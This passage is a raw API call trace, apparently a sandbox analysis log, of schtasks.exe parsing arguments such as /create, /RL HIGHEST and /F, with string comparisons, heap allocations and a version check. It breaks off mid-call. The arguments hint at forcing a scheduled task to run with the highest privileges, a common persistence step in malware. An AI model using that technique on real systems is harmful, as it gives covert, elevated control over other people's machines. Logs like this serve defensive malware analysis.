returned 2 [0172.287] _memicmp (_Buf1=0x9d4df8, _Buf2=0x7c1ed8, _Size=0x7) returned 0 [0172.287] _vsnwprintf (in: _Buffer=0x9d5450, _BufferCount=0x6, _Format="|%s|", _ArgList=0x2dfac8 | out: _Buffer="|run|") returned 5 [0172.287] _vsnwprintf (in: _Buffer=0x9d5410, _BufferCount=0x5, _Format="|%s|", _ArgList=0x2dfac8 | out: _Buffer="|RL|") returned 4 [0172.287] lstrlenW (lpString="|run|") returned 5 [0172.287] lstrlenW (lpString="|RL|") returned 4 [0172.287] StrStrIW (lpFirst="|run|", lpSrch="|RL|") returned 0x0 [0172.287] SetLastError (dwErrCode=0x490) [0172.287] lstrlenW (lpString="end") returned 3 [0172.287] lstrlenW (lpString="end") returned 3 [0172.287] _memicmp (_Buf1=0x9d4dc8, _Buf2=0x7c1ed8, _Size=0x7) returned 0 [0172.287] lstrlenW (lpString="RL") returned 2 [0172.287] _memicmp (_Buf1=0x9d4df8, _Buf2=0x7c1ed8, _Size=0x7) returned 0 [0172.288] _vsnwprintf (in: _Buffer=0x9d5450, _BufferCount=0x6, _Format="|%s|", _ArgList=0x2dfac8 | out: _Buffer="|end|") returned 5 [0172.288] _vsnwprintf (in: _Buffer=0x9d5410, _BufferCount=0x5, _Format="|%s|", _ArgList=0x2dfac8 | out: _Buffer="|RL|") returned 4 [0172.288] lstrlenW (lpString="|end|") returned 5 [0172.288] lstrlenW (lpString="|RL|") returned 4 [0172.288] StrStrIW (lpFirst="|end|", lpSrch="|RL|") returned 0x0 [0172.288] SetLastError (dwErrCode=0x490) [0172.288] lstrlenW (lpString="showsid") returned 7 [0172.288] lstrlenW (lpString="showsid") returned 7 [0172.288] _memicmp (_Buf1=0x9d4dc8, _Buf2=0x7c1ed8, _Size=0x7) returned 0 [0172.288] lstrlenW (lpString="RL") returned 2 [0172.288] _memicmp (_Buf1=0x9d4df8, _Buf2=0x7c1ed8, _Size=0x7) returned 0 [0172.288] _vsnwprintf (in: _Buffer=0x9d5450, _BufferCount=0xa, _Format="|%s|", _ArgList=0x2dfac8 | out: _Buffer="|showsid|") returned 9 [0172.288] _vsnwprintf (in: _Buffer=0x9d5410, _BufferCount=0x5, _Format="|%s|", _ArgList=0x2dfac8 | out: _Buffer="|RL|") returned 4 [0172.288] lstrlenW (lpString="|showsid|") returned 9 [0172.288] lstrlenW (lpString="|RL|") returned 4 [0172.288] StrStrIW (lpFirst="|showsid|", lpSrch="|RL|") returned 0x0 [0172.288] SetLastError (dwErrCode=0x490) [0172.288] SetLastError (dwErrCode=0x490) [0172.288] SetLastError (dwErrCode=0x0) [0172.288] lstrlenW (lpString="/RL") returned 3 [0172.288] StrChrIW (lpStart="/RL", wMatch=0x3a) returned 0x0 [0172.288] SetLastError (dwErrCode=0x490) [0172.289] SetLastError (dwErrCode=0x0) [0172.289] lstrlenW (lpString="/RL") returned 3 [0172.289] GetProcessHeap () returned 0x9c0000 [0172.289] RtlAllocateHeap (HeapHandle=0x9c0000, Flags=0xc, Size=0x8) returned 0x9d6b28 [0172.289] GetProcessHeap () returned 0x9c0000 [0172.289] RtlAllocateHeap (HeapHandle=0x9c0000, Flags=0xc, Size=0x14) returned 0x9d5550 [0172.289] SetLastError (dwErrCode=0x0) [0172.289] SetLastError (dwErrCode=0x0) [0172.289] lstrlenW (lpString="HIGHEST") returned 7 [0172.289] lstrlenW (lpString="-/") returned 2 [0172.289] StrChrIW (lpStart="-/", wMatch=0x48) returned 0x0 [0172.289] SetLastError (dwErrCode=0x490) [0172.289] SetLastError (dwErrCode=0x490) [0172.289] SetLastError (dwErrCode=0x0) [0172.289] lstrlenW (lpString="HIGHEST") returned 7 [0172.289] StrChrIW (lpStart="HIGHEST", wMatch=0x3a) returned 0x0 [0172.289] SetLastError (dwErrCode=0x490) [0172.289] SetLastError (dwErrCode=0x0) [0172.289] lstrlenW (lpString="HIGHEST") returned 7 [0172.289] GetProcessHeap () returned 0x9c0000 [0172.289] RtlAllocateHeap (HeapHandle=0x9c0000, Flags=0xc, Size=0x10) returned 0x9d4e70 [0172.289] GetProcessHeap () returned 0x9c0000 [0172.289] RtlAllocateHeap (HeapHandle=0x9c0000, Flags=0xc, Size=0x14) returned 0x9d5570 [0172.289] SetLastError (dwErrCode=0x0) [0172.289] SetLastError (dwErrCode=0x0) [0172.290] lstrlenW (lpString="/F") returned 2 [0172.290] lstrlenW (lpString="-/") returned 2 [0172.290] StrChrIW (lpStart="-/", wMatch=0x2f) returned="/" [0172.290] lstrlenW (lpString="?") returned 1 [0172.290] lstrlenW (lpString="?") returned 1 [0172.290] _memicmp (_Buf1=0x9d4dc8, _Buf2=0x7c1ed8, _Size=0x7) returned 0 [0172.290] lstrlenW (lpString="F") returned 1 [0172.290] _memicmp (_Buf1=0x9d4df8, _Buf2=0x7c1ed8, _Size=0x7) returned 0 [0172.290] _vsnwprintf (in: _Buffer=0x9d5450, _BufferCount=0x4, _Format="|%s|", _ArgList=0x2dfac8 | out: _Buffer="|?|") returned 3 [0172.290] _vsnwprintf (in: _Buffer=0x9d5410, _BufferCount=0x4, _Format="|%s|", _ArgList=0x2dfac8 | out: _Buffer="|F|") returned 3 [0172.290] lstrlenW (lpString="|?|") returned 3 [0172.290] lstrlenW (lpString="|F|") returned 3 [0172.290] StrStrIW (lpFirst="|?|", lpSrch="|F|") returned 0x0 [0172.290] SetLastError (dwErrCode=0x490) [0172.290] lstrlenW (lpString="create") returned 6 [0172.290] lstrlenW (lpString="create") returned 6 [0172.290] _memicmp (_Buf1=0x9d4dc8, _Buf2=0x7c1ed8, _Size=0x7) returned 0 [0172.290] lstrlenW (lpString="F") returned 1 [0172.290] _memicmp (_Buf1=0x9d4df8, _Buf2=0x7c1ed8, _Size=0x7) returned 0 [0172.291] _vsnwprintf (in: _Buffer=0x9d5450, _BufferCount=0x9, _Format="|%s|", _ArgList=0x2dfac8 | out: _Buffer="|create|") returned 8 [0172.291] _vsnwprintf (in: _Buffer=0x9d5410, _BufferCount=0x4, _Format="|%s|", _ArgList=0x2dfac8 | out: _Buffer="|F|") returned 3 [0172.291] lstrlenW (lpString="|create|") returned 8 [0172.291] lstrlenW (lpString="|F|") returned 3 [0172.291] StrStrIW (lpFirst="|create|", lpSrch="|F|") returned 0x0 [0172.291] SetLastError (dwErrCode=0x490) [0172.291] lstrlenW (lpString="delete") returned 6 [0172.291] lstrlenW (lpString="delete") returned 6 [0172.291] _memicmp (_Buf1=0x9d4dc8, _Buf2=0x7c1ed8, _Size=0x7) returned 0 [0172.291] lstrlenW (lpString="F") returned 1 [0172.291] _memicmp (_Buf1=0x9d4df8, _Buf2=0x7c1ed8, _Size=0x7) returned 0 [0172.291] _vsnwprintf (in: _Buffer=0x9d5450, _BufferCount=0x9, _Format="|%s|", _ArgList=0x2dfac8 | out: _Buffer="|delete|") returned 8 [0172.291] _vsnwprintf (in: _Buffer=0x9d5410, _BufferCount=0x4, _Format="|%s|", _ArgList=0x2dfac8 | out: _Buffer="|F|") returned 3 [0172.291] lstrlenW (lpString="|delete|") returned 8 [0172.291] lstrlenW (lpString="|F|") returned 3 [0172.291] StrStrIW (lpFirst="|delete|", lpSrch="|F|") returned 0x0 [0172.291] SetLastError (dwErrCode=0x490) [0172.291] lstrlenW (lpString="query") returned 5 [0172.292] lstrlenW (lpString="query") returned 5 [0172.292] _memicmp (_Buf1=0x9d4dc8, _Buf2=0x7c1ed8, _Size=0x7) returned 0 [0172.292] lstrlenW (lpString="F") returned 1 [0172.292] _memicmp (_Buf1=0x9d4df8, _Buf2=0x7c1ed8, _Size=0x7) returned 0 [0172.292] _vsnwprintf (in: _Buffer=0x9d5450, _BufferCount=0x8, _Format="|%s|", _ArgList=0x2dfac8 | out: _Buffer="|query|") returned 7 [0172.292] _vsnwprintf (in: _Buffer=0x9d5410, _BufferCount=0x4, _Format="|%s|", _ArgList=0x2dfac8 | out: _Buffer="|F|") returned 3 [0172.292] lstrlenW (lpString="|query|") returned 7 [0172.292] lstrlenW (lpString="|F|") returned 3 [0172.292] StrStrIW (lpFirst="|query|", lpSrch="|F|") returned 0x0 [0172.292] SetLastError (dwErrCode=0x490) [0172.292] lstrlenW (lpString="change") returned 6 [0172.292] lstrlenW (lpString="change") returned 6 [0172.292] _memicmp (_Buf1=0x9d4dc8, _Buf2=0x7c1ed8, _Size=0x7) returned 0 [0172.292] lstrlenW (lpString="F") returned 1 [0172.292] _memicmp (_Buf1=0x9d4df8, _Buf2=0x7c1ed8, _Size=0x7) returned 0 [0172.293] _vsnwprintf (in: _Buffer=0x9d5450, _BufferCount=0x9, _Format="|%s|", _ArgList=0x2dfac8 | out: _Buffer="|change|") returned 8 [0172.293] _vsnwprintf (in: _Buffer=0x9d5410, _BufferCount=0x4, _Format="|%s|", _ArgList=0x2dfac8 | out: _Buffer="|F|") returned 3 [0172.293] lstrlenW (lpString="|change|") returned 8 [0172.293] lstrlenW (lpString="|F|") returned 3 [0172.293] StrStrIW (lpFirst="|change|", lpSrch="|F|") returned 0x0 [0172.293] SetLastError (dwErrCode=0x490) [0172.293] lstrlenW (lpString="run") returned 3 [0172.293] lstrlenW (lpString="run") returned 3 [0172.293] _memicmp (_Buf1=0x9d4dc8, _Buf2=0x7c1ed8, _Size=0x7) returned 0 [0172.293] lstrlenW (lpString="F") returned 1 [0172.293] _memicmp (_Buf1=0x9d4df8, _Buf2=0x7c1ed8, _Size=0x7) returned 0 [0172.293] _vsnwprintf (in: _Buffer=0x9d5450, _BufferCount=0x6, _Format="|%s|", _ArgList=0x2dfac8 | out: _Buffer="|run|") returned 5 [0172.293] _vsnwprintf (in: _Buffer=0x9d5410, _BufferCount=0x4, _Format="|%s|", _ArgList=0x2dfac8 | out: _Buffer="|F|") returned 3 [0172.293] lstrlenW (lpString="|run|") returned 5 [0172.293] lstrlenW (lpString="|F|") returned 3 [0172.294] StrStrIW (lpFirst="|run|", lpSrch="|F|") returned 0x0 [0172.294] SetLastError (dwErrCode=0x490) [0172.294] lstrlenW (lpString="end") returned 3 [0172.294] lstrlenW (lpString="end") returned 3 [0172.294] _memicmp (_Buf1=0x9d4dc8, _Buf2=0x7c1ed8, _Size=0x7) returned 0 [0172.294] lstrlenW (lpString="F") returned 1 [0172.294] _memicmp (_Buf1=0x9d4df8, _Buf2=0x7c1ed8, _Size=0x7) returned 0 [0172.294] _vsnwprintf (in: _Buffer=0x9d5450, _BufferCount=0x6, _Format="|%s|", _ArgList=0x2dfac8 | out: _Buffer="|end|") returned 5 [0172.294] _vsnwprintf (in: _Buffer=0x9d5410, _BufferCount=0x4, _Format="|%s|", _ArgList=0x2dfac8 | out: _Buffer="|F|") returned 3 [0172.294] lstrlenW (lpString="|end|") returned 5 [0172.294] lstrlenW (lpString="|F|") returned 3 [0172.294] StrStrIW (lpFirst="|end|", lpSrch="|F|") returned 0x0 [0172.294] SetLastError (dwErrCode=0x490) [0172.294] lstrlenW (lpString="showsid") returned 7 [0172.294] lstrlenW (lpString="showsid") returned 7 [0172.294] _memicmp (_Buf1=0x9d4dc8, _Buf2=0x7c1ed8, _Size=0x7) returned 0 [0172.294] lstrlenW (lpString="F") returned 1 [0172.294] _memicmp (_Buf1=0x9d4df8, _Buf2=0x7c1ed8, _Size=0x7) returned 0 [0172.295] _vsnwprintf (in: _Buffer=0x9d5450, _BufferCount=0xa, _Format="|%s|", _ArgList=0x2dfac8 | out: _Buffer="|showsid|") returned 9 [0172.295] _vsnwprintf (in: _Buffer=0x9d5410, _BufferCount=0x4, _Format="|%s|", _ArgList=0x2dfac8 | out: _Buffer="|F|") returned 3 [0172.295] lstrlenW (lpString="|showsid|") returned 9 [0172.295] lstrlenW (lpString="|F|") returned 3 [0172.295] StrStrIW (lpFirst="|showsid|", lpSrch="|F|") returned 0x0 [0172.295] SetLastError (dwErrCode=0x490) [0172.295] SetLastError (dwErrCode=0x490) [0172.295] SetLastError (dwErrCode=0x0) [0172.295] lstrlenW (lpString="/F") returned 2 [0172.295] StrChrIW (lpStart="/F", wMatch=0x3a) returned 0x0 [0172.295] SetLastError (dwErrCode=0x490) [0172.295] SetLastError (dwErrCode=0x0) [0172.295] lstrlenW (lpString="/F") returned 2 [0172.295] GetProcessHeap () returned 0x9c0000 [0172.295] RtlAllocateHeap (HeapHandle=0x9c0000, Flags=0xc, Size=0x6) returned 0x9d6b38 [0172.295] GetProcessHeap () returned 0x9c0000 [0172.295] RtlAllocateHeap (HeapHandle=0x9c0000, Flags=0xc, Size=0x14) returned 0x9d5590 [0172.295] SetLastError (dwErrCode=0x0) [0172.296] GetProcessHeap () returned 0x9c0000 [0172.296] GetProcessHeap () returned 0x9c0000 [0172.296] HeapValidate (hHeap=0x9c0000, dwFlags=0x0, lpMem=0x9d6a50) returned 1 [0172.296] GetProcessHeap () returned 0x9c0000 [0172.296] RtlSizeHeap (HeapHandle=0x9c0000, Flags=0x0, MemoryPointer=0x9d6a50) returned 0x8 [0172.296] HeapFree (in: hHeap=0x9c0000, dwFlags=0x0, lpMem=0x9d6a50 | out: hHeap=0x9c0000) returned 1 [0172.296] GetProcessHeap () returned 0x9c0000 [0172.296] GetProcessHeap () returned 0x9c0000 [0172.296] HeapValidate (hHeap=0x9c0000, dwFlags=0x0, lpMem=0x9d5430) returned 1 [0172.296] GetProcessHeap () returned 0x9c0000 [0172.296] RtlSizeHeap (HeapHandle=0x9c0000, Flags=0x0, MemoryPointer=0x9d5430) returned 0x14 [0172.296] HeapFree (in: hHeap=0x9c0000, dwFlags=0x0, lpMem=0x9d5430 | out: hHeap=0x9c0000) returned 1 [0172.296] GetProcessHeap () returned 0x9c0000 [0172.296] GetProcessHeap () returned 0x9c0000 [0172.296] HeapValidate (hHeap=0x9c0000, dwFlags=0x0, lpMem=0x9d4de0) returned 1 [0172.296] GetProcessHeap () returned 0x9c0000 [0172.296] RtlSizeHeap (HeapHandle=0x9c0000, Flags=0x0, MemoryPointer=0x9d4de0) returned 0xc [0172.297] HeapFree (in: hHeap=0x9c0000, dwFlags=0x0, lpMem=0x9d4de0 | out: hHeap=0x9c0000) returned 1 [0172.297] GetProcessHeap () returned 0x9c0000 [0172.297] GetProcessHeap () returned 0x9c0000 [0172.297] HeapValidate (hHeap=0x9c0000, dwFlags=0x0, lpMem=0x9d5470) returned 1 [0172.297] GetProcessHeap () returned 0x9c0000 [0172.297] RtlSizeHeap (HeapHandle=0x9c0000, Flags=0x0, MemoryPointer=0x9d5470) returned 0x14 [0172.297] HeapFree (in: hHeap=0x9c0000, dwFlags=0x0, lpMem=0x9d5470 | out: hHeap=0x9c0000) returned 1 [0172.297] GetProcessHeap () returned 0x9c0000 [0172.297] GetProcessHeap () returned 0x9c0000 [0172.297] HeapValidate (hHeap=0x9c0000, dwFlags=0x0, lpMem=0x9d6a60) returned 1 [0172.297] GetProcessHeap () returned 0x9c0000 [0172.297] RtlSizeHeap (HeapHandle=0x9c0000, Flags=0x0, MemoryPointer=0x9d6a60) returned 0x8 [0172.297] HeapFree (in: hHeap=0x9c0000, dwFlags=0x0, lpMem=0x9d6a60 | out: hHeap=0x9c0000) returned 1 [0172.297] GetProcessHeap () returned 0x9c0000 [0172.297] GetProcessHeap () returned 0x9c0000 [0172.297] HeapValidate (hHeap=0x9c0000, dwFlags=0x0, lpMem=0x9d5490) returned 1 [0172.297] GetProcessHeap () returned 0x9c0000 [0172.297] RtlSizeHeap (HeapHandle=0x9c0000, Flags=0x0, MemoryPointer=0x9d5490) returned 0x14 [0172.297] HeapFree (in: hHeap=0x9c0000, dwFlags=0x0, lpMem=0x9d5490 | out: hHeap=0x9c0000) returned 1 [0172.298] GetProcessHeap () returned 0x9c0000 [0172.298] GetProcessHeap () returned 0x9c0000 [0172.298] HeapValidate (hHeap=0x9c0000, dwFlags=0x0, lpMem=0x9cf830) returned 1 [0172.298] GetProcessHeap () returned 0x9c0000 [0172.298] RtlSizeHeap (HeapHandle=0x9c0000, Flags=0x0, MemoryPointer=0x9cf830) returned 0x76 [0172.298] HeapFree (in: hHeap=0x9c0000, dwFlags=0x0, lpMem=0x9cf830 | out: hHeap=0x9c0000) returned 1 [0172.298] GetProcessHeap () returned 0x9c0000 [0172.298] GetProcessHeap () returned 0x9c0000 [0172.298] HeapValidate (hHeap=0x9c0000, dwFlags=0x0, lpMem=0x9d54b0) returned 1 [0172.298] GetProcessHeap () returned 0x9c0000 [0172.298] RtlSizeHeap (HeapHandle=0x9c0000, Flags=0x0, MemoryPointer=0x9d54b0) returned 0x14 [0172.298] HeapFree (in: hHeap=0x9c0000, dwFlags=0x0, lpMem=0x9d54b0 | out: hHeap=0x9c0000) returned 1 [0172.298] GetProcessHeap () returned 0x9c0000 [0172.298] GetProcessHeap () returned 0x9c0000 [0172.298] HeapValidate (hHeap=0x9c0000, dwFlags=0x0, lpMem=0x9d6af8) returned 1 [0172.298] GetProcessHeap () returned 0x9c0000 [0172.298] RtlSizeHeap (HeapHandle=0x9c0000, Flags=0x0, MemoryPointer=0x9d6af8) returned 0x8 [0172.298] HeapFree (in: hHeap=0x9c0000, dwFlags=0x0, lpMem=0x9d6af8 | out: hHeap=0x9c0000) returned 1 [0172.298] GetProcessHeap () returned 0x9c0000 [0172.298] GetProcessHeap () returned 0x9c0000 [0172.298] HeapValidate (hHeap=0x9c0000, dwFlags=0x0, lpMem=0x9d54d0) returned 1 [0172.298] GetProcessHeap () returned 0x9c0000 [0172.298] RtlSizeHeap (HeapHandle=0x9c0000, Flags=0x0, MemoryPointer=0x9d54d0) returned 0x14 [0172.298] HeapFree (in: hHeap=0x9c0000, dwFlags=0x0, lpMem=0x9d54d0 | out: hHeap=0x9c0000) returned 1 [0172.298] GetProcessHeap () returned 0x9c0000 [0172.298] GetProcessHeap () returned 0x9c0000 [0172.299] HeapValidate (hHeap=0x9c0000, dwFlags=0x0, lpMem=0x9d4e58) returned 1 [0172.299] GetProcessHeap () returned 0x9c0000 [0172.299] RtlSizeHeap (HeapHandle=0x9c0000, Flags=0x0, MemoryPointer=0x9d4e58) returned 0xe [0172.299] HeapFree (in: hHeap=0x9c0000, dwFlags=0x0, lpMem=0x9d4e58 | out: hHeap=0x9c0000) returned 1 [0172.299] GetProcessHeap () returned 0x9c0000 [0172.299] GetProcessHeap () returned 0x9c0000 [0172.299] HeapValidate (hHeap=0x9c0000, dwFlags=0x0, lpMem=0x9d54f0) returned 1 [0172.299] GetProcessHeap () returned 0x9c0000 [0172.299] RtlSizeHeap (HeapHandle=0x9c0000, Flags=0x0, MemoryPointer=0x9d54f0) returned 0x14 [0172.299] HeapFree (in: hHeap=0x9c0000, dwFlags=0x0, lpMem=0x9d54f0 | out: hHeap=0x9c0000) returned 1 [0172.299] GetProcessHeap () returned 0x9c0000 [0172.299] GetProcessHeap () returned 0x9c0000 [0172.299] HeapValidate (hHeap=0x9c0000, dwFlags=0x0, lpMem=0x9d6b08) returned 1 [0172.299] GetProcessHeap () returned 0x9c0000 [0172.299] RtlSizeHeap (HeapHandle=0x9c0000, Flags=0x0, MemoryPointer=0x9d6b08) returned 0x8 [0172.299] HeapFree (in: hHeap=0x9c0000, dwFlags=0x0, lpMem=0x9d6b08 | out: hHeap=0x9c0000) returned 1 [0172.299] GetProcessHeap () returned 0x9c0000 [0172.299] GetProcessHeap () returned 0x9c0000 [0172.299] HeapValidate (hHeap=0x9c0000, dwFlags=0x0, lpMem=0x9d5510) returned 1 [0172.299] GetProcessHeap () returned 0x9c0000 [0172.299] RtlSizeHeap (HeapHandle=0x9c0000, Flags=0x0, MemoryPointer=0x9d5510) returned 0x14 [0172.299] HeapFree (in: hHeap=0x9c0000, dwFlags=0x0, lpMem=0x9d5510 | out: hHeap=0x9c0000) returned 1 [0172.299] GetProcessHeap () returned 0x9c0000 [0172.299] GetProcessHeap () returned 0x9c0000 [0172.299] HeapValidate (hHeap=0x9c0000, dwFlags=0x0, lpMem=0x9d6b18) returned 1 [0172.299] GetProcessHeap () returned 0x9c0000 [0172.299] RtlSizeHeap (HeapHandle=0x9c0000, Flags=0x0, MemoryPointer=0x9d6b18) returned 0x4 [0172.299] HeapFree (in: hHeap=0x9c0000, dwFlags=0x0, lpMem=0x9d6b18 | out: hHeap=0x9c0000) returned 1 [0172.299] GetProcessHeap () returned 0x9c0000 [0172.299] GetProcessHeap () returned 0x9c0000 [0172.299] HeapValidate (hHeap=0x9c0000, dwFlags=0x0, lpMem=0x9d5530) returned 1 [0172.299] GetProcessHeap () returned 0x9c0000 [0172.299] RtlSizeHeap (HeapHandle=0x9c0000, Flags=0x0, MemoryPointer=0x9d5530) returned 0x14 [0172.300] HeapFree (in: hHeap=0x9c0000, dwFlags=0x0, lpMem=0x9d5530 | out: hHeap=0x9c0000) returned 1 [0172.300] GetProcessHeap () returned 0x9c0000 [0172.308] GetProcessHeap () returned 0x9c0000 [0172.308] HeapValidate (hHeap=0x9c0000, dwFlags=0x0, lpMem=0x9d6b28) returned 1 [0172.309] GetProcessHeap () returned 0x9c0000 [0172.309] RtlSizeHeap (HeapHandle=0x9c0000, Flags=0x0, MemoryPointer=0x9d6b28) returned 0x8 [0172.309] HeapFree (in: hHeap=0x9c0000, dwFlags=0x0, lpMem=0x9d6b28 | out: hHeap=0x9c0000) returned 1 [0172.309] GetProcessHeap () returned 0x9c0000 [0172.309] GetProcessHeap () returned 0x9c0000 [0172.309] HeapValidate (hHeap=0x9c0000, dwFlags=0x0, lpMem=0x9d5550) returned 1 [0172.309] GetProcessHeap () returned 0x9c0000 [0172.309] RtlSizeHeap (HeapHandle=0x9c0000, Flags=0x0, MemoryPointer=0x9d5550) returned 0x14 [0172.309] HeapFree (in: hHeap=0x9c0000, dwFlags=0x0, lpMem=0x9d5550 | out: hHeap=0x9c0000) returned 1 [0172.309] GetProcessHeap () returned 0x9c0000 [0172.309] GetProcessHeap () returned 0x9c0000 [0172.309] HeapValidate (hHeap=0x9c0000, dwFlags=0x0, lpMem=0x9d4e70) returned 1 [0172.309] GetProcessHeap () returned 0x9c0000 [0172.312] RtlSizeHeap (HeapHandle=0x9c0000, Flags=0x0, MemoryPointer=0x9d4e70) returned 0x10 [0172.312] HeapFree (in: hHeap=0x9c0000, dwFlags=0x0, lpMem=0x9d4e70 | out: hHeap=0x9c0000) returned 1 [0172.312] GetProcessHeap () returned 0x9c0000 [0172.312] GetProcessHeap () returned 0x9c0000 [0172.312] HeapValidate (hHeap=0x9c0000, dwFlags=0x0, lpMem=0x9d5570) returned 1 [0172.312] GetProcessHeap () returned 0x9c0000 [0172.312] RtlSizeHeap (HeapHandle=0x9c0000, Flags=0x0, MemoryPointer=0x9d5570) returned 0x14 [0172.312] HeapFree (in: hHeap=0x9c0000, dwFlags=0x0, lpMem=0x9d5570 | out: hHeap=0x9c0000) returned 1 [0172.312] GetProcessHeap () returned 0x9c0000 [0172.312] GetProcessHeap () returned 0x9c0000 [0172.313] HeapValidate (hHeap=0x9c0000, dwFlags=0x0, lpMem=0x9d6b38) returned 1 [0172.313] GetProcessHeap () returned 0x9c0000 [0172.313] RtlSizeHeap (HeapHandle=0x9c0000, Flags=0x0, MemoryPointer=0x9d6b38) returned 0x6 [0172.313] HeapFree (in: hHeap=0x9c0000, dwFlags=0x0, lpMem=0x9d6b38 | out: hHeap=0x9c0000) returned 1 [0172.313] GetProcessHeap () returned 0x9c0000 [0172.313] GetProcessHeap () returned 0x9c0000 [0172.313] HeapValidate (hHeap=0x9c0000, dwFlags=0x0, lpMem=0x9d5590) returned 1 [0172.313] GetProcessHeap () returned 0x9c0000 [0172.313] RtlSizeHeap (HeapHandle=0x9c0000, Flags=0x0, MemoryPointer=0x9d5590) returned 0x14 [0172.313] HeapFree (in: hHeap=0x9c0000, dwFlags=0x0, lpMem=0x9d5590 | out: hHeap=0x9c0000) returned 1 [0172.313] GetProcessHeap () returned 0x9c0000 [0172.313] GetProcessHeap () returned 0x9c0000 [0172.313] HeapValidate (hHeap=0x9c0000, dwFlags=0x0, lpMem=0x9d4cc0) returned 1 [0172.313] GetProcessHeap () returned 0x9c0000 [0172.313] RtlSizeHeap (HeapHandle=0x9c0000, Flags=0x0, MemoryPointer=0x9d4cc0) returned 0x10 [0172.313] HeapFree (in: hHeap=0x9c0000, dwFlags=0x0, lpMem=0x9d4cc0 | out: hHeap=0x9c0000) returned 1 [0172.314] SetLastError (dwErrCode=0x0) [0172.314] VerSetConditionMask (ConditionMask=0x0, TypeMask=0x0, Condition=0x2) returned 0x18 [0172.314] VerSetConditionMask (ConditionMask=0x18, TypeMask=0x80000000, Condition=0x1) returned 0x1b [0172.314] VerSetConditionMask (ConditionMask=0x1b, TypeMask=0x80000000, Condition=0x20) returned 0x1801b [0172.314] VerifyVersionInfoW (in: lpVersionInformation=0x2dcee0, dwTypeMask=0x3, dwlConditionMask=0x1801b | out: lpVersionInformation=0x2dcee0) returned 1 [0172.314] SetLastError (dwErrCode=0x0) [0172.314] lstrlenW (lpString="create") returned 6 [0172.314] StrChrIW (lpStart="create", wMatch=0x7c) returned 0x0 [0172.315] SetLastError (dwErrCode=0x490) [0172.315] SetLastError (dwErrCode=0x0) [0172.315] lstrlenW (lpString="create") returned 6 [0172.315] GetProcessHeap () returned 0x9c0000 [0172.315] RtlAllocateHeap (HeapHandle=0x9c0000, Flags=0xc, Size=0x14) returned 0x9d5590 [0172.315] GetProcessHeap () returned 0x9c0000 [0172.315] RtlAllocateHeap (HeapHandle=0x9c0000, Flags=0xc, Size=0x10) returned 0x9d4cc0 [0172.315] _memicmp (_Buf1=0x9d4cc0, _Buf2=0x7c1ed8, _Size=0x7) returned 0 [0172.315] GetProcessHeap () returned 0x9c0000 [0172.315] RtlAllocateHeap (HeapHandle=0x9c0000, Flags=0xc, Size=0x16) returned 0x9d5570 [0172.315] SetLastError (dwErrCode=0x0) [0172.315] _memicmp (_Buf1=0x9d4d38, _Buf2=0x7c1ed8, _Size=0x7) returned 0 [0172.315] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x9d5b78, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\schtasks.exe" (normalized: "c:\\windows\\syswow64\\schtasks.exe")) returned 0x20 [0172.315] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Windows\\SysWOW64\\schtasks.exe", lpdwHandle=0x0 | out: lpdwHandle=0x0) returned 0x744 [0172.316] GetProcessHeap () returned 0x9c0000 [0172.316] RtlAllocateHeap (HeapHandle=0x9c0000, Flags=0xc, Size=0x74e) returned 0x9d5d88 [0172.316] GetFileVersionInfoW (in: lptstrFilename="C:\\Windows\\SysWOW64\\schtasks.exe", dwHandle=0x0, dwLen=0x74e, lpData=0x9d5d88 | out: lpData=0x9d5d88) returned 1 [0172.316] VerQueryValueW (in: pBlock=0x9d5d88, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x2dcfe8, puLen=0x2dcfec | out: lplpBuffer=0x2dcfe8*=0x9d6124, puLen=0x2dcfec) returned 1 [0172.316] _memicmp (_Buf1=0x9d4d38, _Buf2=0x7c1ed8, _Size=0x7) returned 0 [0172.316] _vsnwprintf (in: _Buffer=0x9d5b78, _BufferCount=0x3f, _Format="\\StringFileInfo\\%04x%04x\\InternalName", _ArgList=0x2dcfd0 | out: _Buffer="\\StringFileInfo\\040904b0\\InternalName") returned 37 [0172.316] VerQueryValueW (in: pBlock=0x9d5d88, lpSubBlock="\\StringFileInfo\\040904b0\\InternalName", lplpBuffer=0x2dcff8, puLen=0x2dcff4 | out: lplpBuffer=0x2dcff8*=0x9d5f50, puLen=0x2dcff4) returned 1 [0172.316] lstrlenW (lpString="schtasks.exe") returned 12 [0172.316] lstrlenW (lpString="schtasks.exe") returned 12 [0172.316] lstrlenW (lpString=".EXE") returned 4 [0172.316] StrStrIW (lpFirst="schtasks.exe", lpSrch=".EXE") returned=".exe" [0172.316] lstrlenW (lpString="schtasks.exe") returned 12 [0172.316] lstrlenW (lpString=".EXE") returned 4 [0172.316] lstrlenW (lpString="schtasks") returned 8 [0172.316] lstrlenW (lpString="/create") returned 7 [0172.317] _memicmp (_Buf1=0x9d4d38, _Buf2=0x7c1ed8, _Size=0x7) returned 0 [0172.317] _vsnwprintf (in: _Buffer=0x9d5b78, _BufferCount=0x19, _Format="%s %s", _ArgList=0x2dcfd0 | out: _Buffer="schtasks /create") returned 16 [0172.317] _memicmp (_Buf1=0x9d4d98, _Buf2=0x7c1ed8, _Size=0x7) returned 0 [0172.317] GetProcessHeap () returned 0x9c0000 [0172.317] RtlAllocateHeap (HeapHandle=0x9c0000, Flags=0xc, Size=0x14) returned 0x9d5550 [0172.317] _memicmp (_Buf1=0x9d4db0, _Buf2=0x7c1ed8, _Size=0x7) returned 0 [0172.317] LoadStringW (in: hInstance=0x0, uID=0x15ed, lpBuffer=0x9d6810, cchBufferMax=256 | out: lpBuffer="Type \"%s /?\" for usage.") returned 0x17 [0172.317] lstrlenW (lpString="Type \"%s /?\" for usage.") returned 23 [0172.317] GetProcessHeap () returned 0x9c0000 [0172.317] RtlAllocateHeap (HeapHandle=0x9c0000, Flags=0xc, Size=0x30) returned 0x9d6af8 [0172.317] _vsnwprintf (in: _Buffer=0x9d6768, _BufferCount=0x4f, _Format="Type \"%s /?\" for usage.", _ArgList=0x2dcfd4 | out: _Buffer="Type \"SCHTASKS /CREATE /?\" for usage.") returned 37 [0172.317] GetProcessHeap () returned 0x9c0000 [0172.317] GetProcessHeap () returned 0x9c0000 [0172.317] HeapValidate (hHeap=0x9c0000, dwFlags=0x0, lpMem=0x9d5d88) returned 1 [0172.317] GetProcessHeap () returned 0x9c0000 [0172.317] RtlSizeHeap (HeapHandle=0x9c0000, Flags=0x0, MemoryPointer=0x9d5d88) returned 0x74e [0172.317] HeapFree (in: hHeap=0x9c0000, dwFlags=0x0, 